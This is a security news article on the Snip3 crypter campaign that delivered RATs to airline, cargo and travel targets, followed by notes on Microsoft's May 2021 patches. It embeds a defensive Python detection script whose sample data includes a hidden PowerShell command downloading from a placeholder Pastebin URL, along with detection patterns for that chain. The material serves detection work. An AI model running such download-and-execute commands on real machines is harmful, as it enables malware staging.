Microsoft discovered a spear-phishing campaign in the wild targeting airline, cargo, and travel industries with multiple Remote Access Trojans (RATs). The technology giant stated that attackers distributed malware payloads via phishing emails imitating legitimate businesses with malicious image and PDF attachments.
“The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads,” Microsoft said.
In the past few months, Microsoft has been tracking a dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT. pic.twitter.com/aeMfUUoVvf
— Microsoft Security Intelligence (@MsftSecIntel) May 11, 2021
Stealthy Malware Loader
Threat actors use multiple RATs to exfiltrate sensitive data from critical systems and to stage additional malware payloads. According to cybersecurity firm Morphisec, the RATs are delivered by a new and stealthy malware loader sold as a Crypter-as-a-Service, which spreads them onto targeted machines.
The Crypter-as-a-Service, dubbed “Snip3,” is used to deploy Revenge RAT, Agent Tesla, AsyncRAT, and NetWire RAT payloads on compromised systems. Snip3 implements several advanced techniques to bypass detection, such as:
- Executing PowerShell code with the RemoteSigned execution policy parameter
- Validating the existence of Windows Sandbox and VMWare virtualization
- Using Pastebin and top4top for staging
- Compiling RunPE loaders on the endpoint in runtime
Once the malicious attachment is downloaded, the first-stage VBScript (VBS) file runs and launches the second-stage PowerShell script, which in turn executes the final RAT payload using Process Hollowing.
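The evasion list and the VBS-to-PowerShell chain above translate directly into endpoint detection logic. The following is an added example, not code from Microsoft or Morphisec: a small Python rule set run over constructed Sysmon-style process-creation events (the event shape, field names, process IDs and command lines are all assumptions made for the example). It flags PowerShell launched by a Windows script host, the RemoteSigned/Bypass execution-policy override, a hidden window, references to the Pastebin and top4top staging services, and the parent/child chain of a .vbs file spawning PowerShell. Process Hollowing itself is not visible in process-creation telemetry and would need memory or API-level monitoring, which this example does not cover.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed Sysmon-style ProcessCreate events (sample data for the example, not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 1604,
     "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Shipment_details.vbs"'},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": ('powershell.exe -ExecutionPolicy RemoteSigned -NoProfile -WindowStyle Hidden '
                      '-Command "$s = (New-Object Net.WebClient).DownloadString('
                      '\'https://pastebin.com/raw/PLACEHOLDER\')"')},
    {"pid": 5202, "ppid": 1604,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -NoProfile -File "C:\Scripts\nightly_backup.ps1"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}
STAGING_SERVICES = ("pastebin.com", "top4top")

# -ExecutionPolicy (or the abbreviated forms -ex / -ep that powershell.exe accepts)
# followed by a policy that allows downloaded or unsigned script code to run.
EXEC_POLICY_RE = re.compile(r"-(?:ex\w*|ep)\s+(?:remotesigned|bypass|unrestricted)", re.IGNORECASE)
HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so rules are case-insensitive."""
    return PureWindowsPath(path).name.lower()


def event_findings(event: dict) -> list[str]:
    """Single-event rules; each label names one suspicious trait of the event."""
    findings = []
    cmd = event["command_line"]
    if basename(event["parent_image"]) in SCRIPT_HOSTS and basename(event["image"]) in POWERSHELL_HOSTS:
        findings.append("script_host_spawns_powershell")
    if EXEC_POLICY_RE.search(cmd):
        findings.append("execution_policy_override")
    if HIDDEN_WINDOW_RE.search(cmd):
        findings.append("hidden_window")
    if any(svc in cmd.lower() for svc in STAGING_SERVICES):
        findings.append("known_staging_service")
    return findings


def analyze(events: list[dict]) -> dict[int, list[str]]:
    """Apply the per-event rules, then correlate parent and child to spot the .vbs -> PowerShell chain."""
    by_pid = {e["pid"]: e for e in events}
    results = defaultdict(list)
    for e in events:
        results[e["pid"]].extend(event_findings(e))
    for e in events:
        parent = by_pid.get(e["ppid"])
        # Chain rule: PowerShell whose parent is a script host that was itself started on a .vbs file.
        if (parent is not None
                and basename(parent["image"]) in SCRIPT_HOSTS
                and ".vbs" in parent["command_line"].lower()
                and basename(e["image"]) in POWERSHELL_HOSTS):
            results[e["pid"]].append("vbs_to_powershell_chain")
    # Only return processes with at least one finding.
    return {pid: f for pid, f in results.items() if f}


if __name__ == "__main__":
    for pid, findings in analyze(SAMPLE_EVENTS).items():
        print(pid, ", ".join(findings))
```

The legitimate backup script (pid 5202) produces no findings because none of the traits apply; the second-stage PowerShell (pid 4188) trips every rule, and the chain rule fires only because its parent process is present in the same batch, which is why correlating across events matters more than any single command-line pattern.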
“The Snip3 Crypter’s ability to identify sandboxing and virtual environments makes it especially capable of bypassing detection-centric solutions. As a result, organizations with detection-focused stacks need to be wary of attacks like Snip3 and others. Morphisec customers can rest easy that they are protected against the evasive techniques Snip3 and other attacks like it employ,” Morphisec said.
Microsoft Fixes 55 Flaws
In a recent development, Microsoft’s May Patch Tuesday security update addressed over 55 vulnerabilities, including four critically rated Zero-Day bugs. The now patched Zero-Day vulnerabilities include CVE-2021-31204, a .NET and Visual Studio Elevation of Privilege Vulnerability; CVE-2021-31207, a Microsoft Exchange Server Security Feature Bypass Vulnerability; CVE-2021-31200, a Common Utilities Remote Code Execution Vulnerability; and CVE-2021-31166, flagged by the Zero Day Initiative.